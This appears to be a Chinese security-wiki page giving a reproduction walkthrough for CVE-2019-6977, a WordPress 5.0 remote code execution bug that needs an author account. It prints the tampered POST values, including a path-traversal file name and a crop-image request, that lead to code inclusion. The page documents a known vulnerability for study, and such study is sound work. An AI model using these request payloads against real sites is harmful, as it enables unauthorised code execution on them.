menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 002-WordPress 系统漏洞 chevron_right 007-CVE-2019-6977 WordPress 5.0 RCE.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    007-CVE-2019-6977 WordPress 5.0 RCE.md
    1.58 KB / 2021-07-17 00:01:32
        # CVE-2019-6977 WordPress 5.0 RCE
    
    ### 一、漏洞简介
    
    漏洞条件:拥有一个author权限的账号
    
    ### 二、漏洞影响
    
    影响包括windows、linux、mac在内的服务端,后端图片处理库为gd/imagick都受到影响,只不过利用难度有所差异。
    
    其中,原文提到只影响release 5.0.0版,但现在官网上可以下载的5.0.0已经修复该漏洞。实际在WordPress 5.1-alpha-44280更新后未更新的4.9.9~5.0.0的WordPress都受到该漏洞影响。
    
    ### 三、复现过程
    
    传图片
    
    ![](images/15895253846231.png)
    
    
    改信息
    
    ![](images/15895253915776.png)
    
    
    保留该数据包,并添加POST
    
    
    ```bash
    &meta_input[_wp_attached_file]=2019/02/2-4.jpg#/../../../../themes/twentynineteen/32.jpg
    ```
    
    触发需要的裁剪
    
    ![](images/15895254092344.png)
    
    
    裁剪
    
    ![](images/15895254170255.png)
    
    
    同理保留改数据包,并将POST改为下面的操作,其中nonce以及id不变
    
    
    ```bash
    action=crop-image&_ajax_nonce=8c2f0c9e6b&id=74&cropDetails[x1]=10&cropDetails[y1]=10&cropDetails[width]=10&cropDetails[height]=10&cropDetails[dst_width]=100&cropDetails[dst_height]=100
    ```
    
    触发需要的裁剪
    
    ![](images/15895254356749.png)
    
    
    图片已经过去了
    
    ![](images/15895254429945.png)
    
    
    包含,我们选择上传一个test.txt,然后再次修改信息,如前面
    
    
    ```bash
    &meta_input[_wp_page_template]=cropped-32.jpg
    ```
    
    ![](images/15895254574491.png)
    
    
    点击查看附件页面,如果图片被裁剪之后仍保留敏感代码,则命令执行成功。
    
    ![](images/15895254646564.png)
    
    
    ### 四、参考链接
    
    https://www.freebuf.com/vuls/196514.html
    
    links
    file_download